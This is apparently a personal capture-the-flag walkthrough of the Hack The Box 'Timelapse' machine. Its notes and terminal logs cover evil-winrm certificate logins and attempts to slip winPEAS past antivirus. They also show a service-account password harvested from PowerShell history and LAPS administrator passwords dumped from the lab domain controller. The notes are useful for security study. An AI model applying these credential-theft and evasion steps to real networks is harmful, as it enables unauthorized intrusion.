└─$ evil-winrm -i 10.10.11.152 -u legaccy -p "dummy" -c /home/kali/HTB/timelapse/certificate.crt -k /home/kali/HTB/timelapse/privatekey.pem

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: Useless cert/s provided, SSL is not enabled
                                        
Info: Establishing connection to remote endpoint
^C
                                        
Warning: Press "y" to exit, press any other key to continue
                                        
Info: Exiting...

after looking online looks like we have to do -S to force it to use ssl so we use the initial command with -S

evil-winrm -S -i 10.10.11.152 -u legaccy -c /home/kali/HTB/timelapse/certificate.crt -k /home/kali/HTB/timelapse/privatekey.pem

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ evil-winrm -S -i 10.10.11.152 -u legaccy -c /home/kali/HTB/timelapse/certificate.crt -k /home/kali/HTB/timelapse/privatekey.pem       
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> 


and we are in!!!

*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ../
*Evil-WinRM* PS C:\Users\legacyy> ls


    Directory: C:\Users\legacyy


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---       10/25/2021   8:25 AM                Desktop
d-r---       10/25/2021   8:22 AM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        9/15/2018  12:19 AM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos


*Evil-WinRM* PS C:\Users\legacyy> cd Desktop
*Evil-WinRM* PS C:\Users\legacyy\Desktop> ls


    Directory: C:\Users\legacyy\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/14/2023   1:08 PM             34 user.txt


*Evil-WinRM* PS C:\Users\legacyy\Desktop> cat user.txt
b4d108259211b472c1f480aecdaf68d4

Privesc

We will try and load the powershell file we saw before in;

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ cd WindowsPowershell 
                                                                                                        
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell]
└─$ ls
v1.0
                                                                                                        
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell]
└─$ cd v1.0             
                                                                                                        
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell/v1.0]
└─$ ls
Modules
                                                                                                        
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell/v1.0]
└─$ cd Modules 
                                                                                                        
┌──(kali㉿kali)-[~/…/timelapse/WindowsPowershell/v1.0/Modules]
└─$ ls
AdmPwd.PS
                                                                                                        
┌──(kali㉿kali)-[~/…/timelapse/WindowsPowershell/v1.0/Modules]
└─$ cd AdmPwd.PS 
                                                                                                        
┌──(kali㉿kali)-[~/…/WindowsPowershell/v1.0/Modules/AdmPwd.PS]
└─$ ls
AdmPwd.PS.dll  AdmPwd.PS.format.ps1xml  AdmPwd.PS.psd1  AdmPwd.Utils.dll  en-US
                                                                                                        
┌──(kali㉿kali)-[~/…/WindowsPowershell/v1.0/Modules/AdmPwd.PS]
└─$ 

we upload the directory to windows machine

privatekey.pem
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> upload /home/kali/HTB/timelapse/AdmPwd.PS
                                        
Info: Uploading /home/kali/HTB/timelapse/AdmPwd.PS to C:\Users\legacyy\Documents\AdmPwd.PS
                                        
Data: 42372 bytes of 42372 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls


    Directory: C:\Users\legacyy\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/14/2023   4:03 PM                AdmPwd.PS


c*Evil-WinRM* PS C:\Users\legacyy\Documents> cd AdmPwd.PS
Cannot find path 'C:\Users\legacyy\Documents\AAdmPwd.PS' because it does not exist.
At line:1 char:1
+ cd AAdmPwd.PS
+ ~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\legacyy\Documents\AAdmPwd.PS:String) [Set-Location], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.SetLocationCommand
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd AdmPwd.PS

output

└─$ evil-winrm -S -i 10.10.11.152 -u legaccy -c /home/kali/HTB/timelapse/certificate.crt -k /home/kali/HTB/timelapse/privatekey.pem
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls


    Directory: C:\Users\legacyy\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/14/2023   4:03 PM                AdmPwd.PS


*Evil-WinRM* PS C:\Users\legacyy\Documents> Import-Module C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.PS.psd1

*Evil-WinRM* PS C:\Users\legacyy\Documents> 
*Evil-WinRM* PS C:\Users\legacyy\Documents> Get-Content AdmPwd.PS.psd1
Cannot find path 'C:\Users\legacyy\Documents\AdmPwd.PS.psd1' because it does not exist.
At line:1 char:1
+ Get-Content AdmPwd.PS.psd1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\legacy...\AdmPwd.PS.psd1:String) [Get-Content], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\legacyy\Documents> [Reflection.Assembly]::LoadFile("C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.PS.dll")
Enter PEM pass phrase:
Enter PEM pass phrase:

GAC    Version        Location
---    -------        --------
False  v4.0.30319     C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.PS.dll


*Evil-WinRM* PS C:\Users\legacyy\Documents> [Reflection.Assembly]::LoadFile("C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.Utils.dll")
Enter PEM pass phrase:

GAC    Version        Location
---    -------        --------
False  v4.0.30319     C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.Utils.dll


*Evil-WinRM* PS C:\Users\legacyy\Documents> Import-Module C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.PS.psd1
*Evil-WinRM* PS C:\Users\legacyy\Documents> Get-Content AdmPwd.PS.psd1
Enter PEM pass phrase:
Cannot find path 'C:\Users\legacyy\Documents\AdmPwd.PS.psd1' because it does not exist.
At line:1 char:1
+ Get-Content AdmPwd.PS.psd1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\legacy...\AdmPwd.PS.psd1:String) [Get-Content], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\legacyy\Documents> Get-Content C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.PS.psd1
Enter PEM pass phrase:
#
# Module manifest for module 'AdmPwd.PS'
#
# Generated by: Jiri Formacek - MSFT
#
# Generated on: 3.12.2012
#


@{

# Script module or binary module file associated with this manifest
ModuleToProcess = '.\AdmPwd.PS.dll'

# Version number of this module.
ModuleVersion = '5.0.0.0'

# ID used to uniquely identify this module
GUID = '11869C0C-4440-4560-AA89-9EEF0C0224FA'

# Author of this module
Author = 'Jiri Formacek - MSFT'

# Company or vendor of this module
CompanyName = 'Microsoft | Services'

# Copyright statement for this module
Copyright = ''

# Description of the functionality provided by this module
Description = 'Provides cmdlets for configuration and usage of Local admin password management solution'

# Minimum version of the Windows PowerShell engine required by this module
PowerShellVersion = ''

# Name of the Windows PowerShell host required by this module
PowerShellHostName = ''

# Minimum version of the Windows PowerShell host required by this module
PowerShellHostVersion = ''

# Minimum version of the .NET Framework required by this module
DotNetFrameworkVersion = ''

# Minimum version of the common language runtime (CLR) required by this module
CLRVersion = ''

# Processor architecture (None, X86, Amd64, IA64) required by this module
ProcessorArchitecture = ''

# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @()

# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = @()

# Script files (.ps1) that are run in the caller's environment prior to importing this module
ScriptsToProcess = @()

# Type files (.ps1xml) to be loaded when importing this module
TypesToProcess = @()

# Format files (.ps1xml) to be loaded when importing this module
FormatsToProcess = @('AdmPwd.PS.format.ps1xml')

# Modules to import as nested modules of the module specified in ModuleToProcess
NestedModules = @()

# Functions to export from this module
FunctionsToExport = ''

# Cmdlets to export from this module
CmdletsToExport = '*'

# Variables to export from this module
VariablesToExport = '*'

# Aliases to export from this module
AliasesToExport = '*'

# List of all modules packaged with this module
ModuleList = @()

# List of all files packaged with this module
FileList = @('AdmPwd.PS.dll','AdmPwd.Utils.dll','AdmPwd.PS.format.ps1xml')

# Private data to pass to the module specified in ModuleToProcess
PrivateData = ''

}

To get the available command as suggested by chatGPT — Get-Command -Module ‘AdmPwd.PS’

*Evil-WinRM* PS C:\Users\legacyy\Documents\AdmPwd.PS> Get-Command -Module 'AdmPwd.PS'
Enter PEM pass phrase:

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Cmdlet          Find-AdmPwdExtendedRights                          5.0.0.0    AdmPwd.PS
Cmdlet          Get-AdmPwdPassword                                 5.0.0.0    AdmPwd.PS
Cmdlet          Reset-AdmPwdPassword                               5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdAuditing                                 5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdComputerSelfPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdReadPasswordPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdResetPasswordPermission                  5.0.0.0    AdmPwd.PS
Cmdlet          Update-AdmPwdADSchema                              5.0.0.0    AdmPwd.PS

i will try and get the adminpassword — Get-AdmPwdPassword

but nothing happened
Get-AdmPwdPassword -ComputerName DC01

Enter PEM pass phrase:

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Cmdlet          Find-AdmPwdExtendedRights                          5.0.0.0    AdmPwd.PS
Cmdlet          Get-AdmPwdPassword                                 5.0.0.0    AdmPwd.PS
Cmdlet          Reset-AdmPwdPassword                               5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdAuditing                                 5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdComputerSelfPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdReadPasswordPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdResetPasswordPermission                  5.0.0.0    AdmPwd.PS
Cmdlet          Update-AdmPwdADSchema                              5.0.0.0    AdmPwd.PS


*Evil-WinRM* PS C:\Users\legacyy\Documents> Get-AdmPwdPassword -ComputerName DC01

Enter PEM pass phrase:
Enter PEM pass phrase:

ComputerName         DistinguishedName                             Password           ExpirationTimestamp
------------         -----------------                             --------           -------------------
DC01                 CN=DC01,OU=Domain Controllers,DC=timelapse...                    9/19/2023 1:08:21 PM


*Evil-WinRM* PS C:\Users\legacyy\Documents> 


No luck with this uproach

i will try and run winpeas

I upload and run it on the machine

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ evil-winrm -S -i 10.10.11.152 -u legaccy -c /home/kali/HTB/timelapse/certificate.crt -k /home/kali/HTB/timelapse/
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplement
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> upload /home/kali/HTB/timelapse/winPEASx64.exe`
                                        
Info: Uploading /home/kali/HTB/timelapse/winPEASx64.exe to C:\Users\legacyy\Documents\winPEASx64.exe
Enter PEM pass phrase:
                                        
Data: 3183956 bytes of 3183956 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\legacyy\Documents> 

running winPEAS and looks like its detected as a virus and gets deleted so i upload it again

*Evil-WinRM* PS C:\Users\legacyy\Documents> ./winPEASx64.exe
Enter PEM pass phrase:
Program 'winPEASx64.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted softwareAt line:1 char:1
+ ./winPEASx64.exe
+ ~~~~~~~~~~~~~~~~.
At line:1 char:1
+ ./winPEASx64.exe
+ ~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed
*Evil-WinRM* PS C:\Users\legacyy\Documents> Set-ExecutionPolicy Bypass -Scope Process -Force
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> ./winPEASx64.exe
Enter PEM pass phrase:
The term './winPEASx64.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ ./winPEASx64.exe
+ ~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (./winPEASx64.exe:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\legacyy\Documents> Get-ChildItem -Path . -Filter winPEASx64.exe
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls
*Evil-WinRM* PS C:\Users\legacyy\Documents> upload winPEASx64.exe


uploaded winoPEAS EXE and the powershell Invoke-winPEAS.ps1

┌──(kali㉿kali)-[~/Downloads/x64]
└─$ locate winPEAS
/home/kali/Downloads/winPEASx64.exe
/home/kali/Downloads/winPEASx86.exe
/home/kali/HTB/Sauna/winPEASx64.exe
/home/kali/HTB/timelapse/winPEASx64.exe
/usr/share/powershell-empire/empire/server/data/module_source/privesc/Invoke-winPEAS.ps1
/usr/share/powershell-empire/empire/server/modules/powershell/privesc/winPEAS.yaml
                                                                                                                     
┌──(kali㉿kali)-[~/Downloads/x64]
└─$ cd /usr/share/powershell-empire/empire/server/data/module_source/privesc/ 
                                                                                                                     
┌──(kali㉿kali)-[/usr/…/server/data/module_source/privesc]
└─$ cpInvoke-winPEAS.ps1 ~/HTB/timelapse                                     
cpInvoke-winPEAS.ps1: command not found
                                                                                                                     
┌──(kali㉿kali)-[/usr/…/server/data/module_source/privesc]
└─$ cp Invoke-winPEAS.ps1 ~/HTB/timelapse
                                                                                                                     
┌──(kali㉿kali)-[/usr/…/server/data/module_source/privesc]
└─$ 

Will run the following steps

Set-ExecutionPolicy Bypass -Scope Process -Force
. .\Invoke-winPEAS.ps1
Invoke-winPEAS

getting blocked by antivirus again

*Evil-WinRM* PS C:\Users\legacyy\Documents> Set-ExecutionPolicy Bypass -Scope Process -Force
*Evil-WinRM* PS C:\Users\legacyy\Documents> . .\Invoke-winPEAS.ps1
At C:\Users\legacyy\Documents\Invoke-winPEAS.ps1:1 char:1
+ function Invoke-winPEAS
+ ~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At C:\Users\legacyy\Documents\Invoke-winPEAS.ps1:1 char:1
+ function Invoke-winPEAS
+ ~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls


    Directory: C:\Users\legacyy\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/15/2023   4:56 AM         941879 Invoke-winPEAS.ps1
-a----        9/15/2023   4:51 AM        2367796 winPEASx64.exe


*Evil-WinRM* PS C:\Users\legacyy\Documents> Invoke-winPEAS
The term 'Invoke-winPEAS' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ Invoke-winPEAS
+ ~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Invoke-winPEAS:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\legacyy\Documents> 

aftert researhc, creat bat file with contents. Then we upload and run it on the computer where we have the winpeas

└─$ cat runWinPEAS.bat 
@echo off
powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File "C:\Users\legacyy\Documents\Invoke-winPEAS.ps1"
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ 

this fails again after detection as virus

*Evil-WinRM* PS C:\Users\legacyy\Documents> ;s
The term 's' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:2
+ ;s
+  ~
    + CategoryInfo          : ObjectNotFound: (s:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls


    Directory: C:\Users\legacyy\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/15/2023   4:56 AM         941879 Invoke-winPEAS.ps1
-a----        9/15/2023   5:03 AM            134 runWinPEAS.bat
-a----        9/15/2023   4:51 AM        2367796 winPEASx64.exe


*Evil-WinRM* PS C:\Users\legacyy\Documents> ./runWinPEAS.bat
runWinPEAS.bat : At C:\Users\legacyy\Documents\Invoke-winPEAS.ps1:1 char:1
    + CategoryInfo          : NotSpecified: (At C:\Users\leg...AS.ps1:1 char:1:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
+ function Invoke-winPEAS+ ~~~~~~~~~~~~~~~~~~~~~~~This script contains malicious content and has been blocked by your antivirus software.    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException    + FullyQualifiedErrorId : ScriptContainedMaliciousContent *Evil-WinRM* PS C:\Users\legacyy\Documents> 

downoloaded winPEAS.bat from – https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASbat

uploaded it and tried to run it

it ran and crashed but after giving us this output

*Evil-WinRM* PS C:\Users\legacyy\Documents> ./winPEAS.bat
winPEAS.bat : The system cannot find the batch label specified - SetOnce
    + CategoryInfo          : NotSpecified: (The system cann...ified - SetOnce:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

The system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLinePowerShell v2 Version:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine
    PowerShellVersion    REG_SZ    2.0

PowerShell v5 Version:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine
    PowerShellVersion    REG_SZ    5.1.17763.1

Transcriptions Settings:
Module logging settings:
Scriptblog logging settings:

PS default transcript history

Checking PS history file
 Volume in drive C has no label.
 Volume Serial Number is 22CC-AE66

 Directory of C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine

03/04/2022  12:46 AM               434 ConsoleHost_history.txt
               1 File(s)            434 bytes
               0 Dir(s)   6,800,072,704 bytes free

The system cannot find the batch label specified - T_Progress******  B A T C H   R E C U R S I O N  exceeds STACK limits ******Recursion Count=344, Stack Usage=90 percent******       B A T C H   PROCESSING IS   A B O R T E D     

Intersted in looking at ConsoleHost_history.txt which is inside C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine. We get it and download the file

*Evil-WinRM* PS C:\Users\legacyy\Documents> cd C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> ls


    Directory: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         3/3/2022  11:46 PM            434 ConsoleHost_history.txt


*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> download ConsoleHost_history.txt
                                        
Info: Downloading C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt to ConsoleHost_history.txt                                                                                             
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> 

we check on this file

└─$ cat ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
                                                                                                                             
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ 

Usernam svc_deploy and password E3R$Q62^12p7PLlC%KWaxuaV. I tried normal evil-wrm but no luck then tried with -S and got it

└─$ evil-winrm -S -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> 

Going to try and upload the files i tried before with the other user

Import-Module C:\Users\svc_deploy\Documents\AdmPwd.PS\AdmPwd.PS.psd1

*Evil-WinRM* PS C:\Users\svc_deploy\Documents\AdmPwd.PS> Get-Command -Module 'AdmPwd.PS'

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Cmdlet          Find-AdmPwdExtendedRights                          5.0.0.0    AdmPwd.PS
Cmdlet          Get-AdmPwdPassword                                 5.0.0.0    AdmPwd.PS
Cmdlet          Reset-AdmPwdPassword                               5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdAuditing                                 5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdComputerSelfPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdReadPasswordPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdResetPasswordPermission                  5.0.0.0    AdmPwd.PS
Cmdlet          Update-AdmPwdADSchema                              5.0.0.0    AdmPwd.PS

we run get Get-AdmPwdPassword

*Evil-WinRM* PS C:\Users\svc_deploy\Documents\AdmPwd.PS> Get-AdmPwdPassword -ComputerName DC01


ComputerName         DistinguishedName                             Password           ExpirationTimestamp
------------         -----------------                             --------           -------------------
DC01                 CN=DC01,OU=Domain Controllers,DC=timelapse... x6N4C+9O88}}#mN... 9/20/2023 3:40:41 AM


*Evil-WinRM* PS C:\Users\svc_deploy\Documents\AdmPwd.PS> 
*Evil-WinRM* PS C:\Users\svc_deploy\Documents\AdmPwd.PS> 

to get better view as this is truncated we use Format list – Get-AdmPwdPassword -ComputerName DC01 | Format-List

*Evil-WinRM* PS C:\Users\svc_deploy\Documents\AdmPwd.PS> Get-AdmPwdPassword -ComputerName DC01 | Format-List


ComputerName        : DC01
DistinguishedName   : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
Password            : x6N4C+9O88}}#mN4Tirl43/o
ExpirationTimestamp : 9/20/2023 3:40:41 AM

will try and log in with this credentials – evil-winrm -S -i 10.10.11.152 -u administrator -p ‘x6N4C+9O88}}#mN4Tirl43/o’. remebering to use the -S switch. Tried without and it didnt work and with and ity worked and we got root but i cant find the root.txt file

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ evil-winrm -S -i 10.10.11.152 -u administrator -p 'x6N4C+9O88}}#mN4Tirl43/o'

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../
*Evil-WinRM* PS C:\Users\Administrator> ls


    Directory: C:\Users\Administrator


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---       10/23/2021  11:27 AM                3D Objects
d-r---       10/23/2021  11:27 AM                Contacts
d-r---         3/3/2022   7:48 PM                Desktop
d-r---       10/23/2021  12:22 PM                Documents
d-r---       10/25/2021   2:06 PM                Downloads
d-r---       10/23/2021  11:27 AM                Favorites
d-r---       10/23/2021  11:28 AM                Links
d-r---       10/23/2021  11:27 AM                Music
d-r---       10/23/2021  11:27 AM                Pictures
d-r---       10/23/2021  11:27 AM                Saved Games
d-r---       10/23/2021  11:27 AM                Searches
d-r---       10/23/2021  11:27 AM                Videos


c*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls -Recurse | ? { $_.Name -eq 'root.txt' }

*Evil-WinRM* PS C:\Users\Administrator\Desktop> 
*Evil-WinRM* PS C:\Users\Administrator\Desktop> 

i will restart the machine and try again. after rebooting i cannot connect again.

will try an dget password again as it may have changed

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ evil-winrm -S -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> upload AdmPwd.PS
                                        
Info: Uploading /home/kali/HTB/timelapse/AdmPwd.PS to C:\Users\svc_deploy\Documents\AdmPwd.PS
                                        
Data: 42372 bytes of 42372 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Import-Module C:\Users\svc_deploy\Documents\AdmPwd.PS\AdmPwd.PS.psd1
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-Command -Module 'AdmPwd.PS'

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Cmdlet          Find-AdmPwdExtendedRights                          5.0.0.0    AdmPwd.PS
Cmdlet          Get-AdmPwdPassword                                 5.0.0.0    AdmPwd.PS
Cmdlet          Reset-AdmPwdPassword                               5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdAuditing                                 5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdComputerSelfPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdReadPasswordPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdResetPasswordPermission                  5.0.0.0    AdmPwd.PS
Cmdlet          Update-AdmPwdADSchema                              5.0.0.0    AdmPwd.PS


*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-Command -Module 'AdmPwd.PS'

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Cmdlet          Find-AdmPwdExtendedRights                          5.0.0.0    AdmPwd.PS
Cmdlet          Get-AdmPwdPassword                                 5.0.0.0    AdmPwd.PS
Cmdlet          Reset-AdmPwdPassword                               5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdAuditing                                 5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdComputerSelfPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdReadPasswordPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdResetPasswordPermission                  5.0.0.0    AdmPwd.PS
Cmdlet          Update-AdmPwdADSchema                              5.0.0.0    AdmPwd.PS


*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-AdmPwdPassword -ComputerName DC01 | Format-List


ComputerName        : DC01
DistinguishedName   : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
Password            : I5wQ0fGrS}M;}xe+6KtQ5b3]
ExpirationTimestamp : 9/20/2023 6:06:08 AM



*Evil-WinRM* PS C:\Users\svc_deploy\Documents> 

New password – I5wQ0fGrS}M;}xe+6KtQ5b3]

We connect again but cannot find flag again

┌──(kali㉿kali)-[~/HTB/timelapse]
